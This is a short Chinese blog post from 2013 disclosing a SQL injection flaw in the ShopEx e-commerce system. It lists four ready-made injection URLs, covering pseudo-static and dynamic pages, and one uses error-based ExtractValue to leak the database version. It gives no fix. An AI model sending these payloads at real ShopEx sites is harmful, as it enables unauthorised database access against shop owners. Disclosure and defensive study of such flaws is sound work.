关注我们
QRcode 邮件联系 QRcode
主页 » 信息安全 » 正文

网店系统shopex最新注入漏洞通杀

 feng 2013/02/04 21:47  601 ℃  1条点评

注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术...

好吧,我扯远了~~

其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~

不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:

http://www.afeng.org/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html
http://www.afeng.org/comment-8967'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/@@version)))/**/order/**/by/**/'1-ask-commentlist.html

http://www.afeng.org/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html
http://www.afeng.org/485/index.php?comment-190'/**/and/**/'1'='1-ask-commentlist.html

 

一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。

如何注入就不多说了,10多年的东西了...不会的也该学会了...

本文标签:
服务器网站打包批量压缩php脚本
红黑联盟现场培训(脱产)第一期开始咯
Joy:一款用于捕获和分析网络内部流量数据的工具Joy:一款用于捕获和分析网络内部流量数据的工具One-Lin3r:懒人的福音,渗透测试单行化工具One-Lin3r:懒人的福音,渗透测试单行化工具EvilURL v2.0一个生成用于钓鱼攻击的IDN域名的工具EvilURL v2.0一个生成用于钓鱼攻击的IDN域名的工具国产网站恶意代码监测(网马监控)工具优化版国产网站恶意代码监测(网马监控)工具优化版

已有1条评论,欢迎点评!

smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley

  1. #1 I'm not 骇客

    求个友链啊 :razz: :razz: :razz:

    2013-02-05 下午 11:16回复


注册帐号  |  忘记密码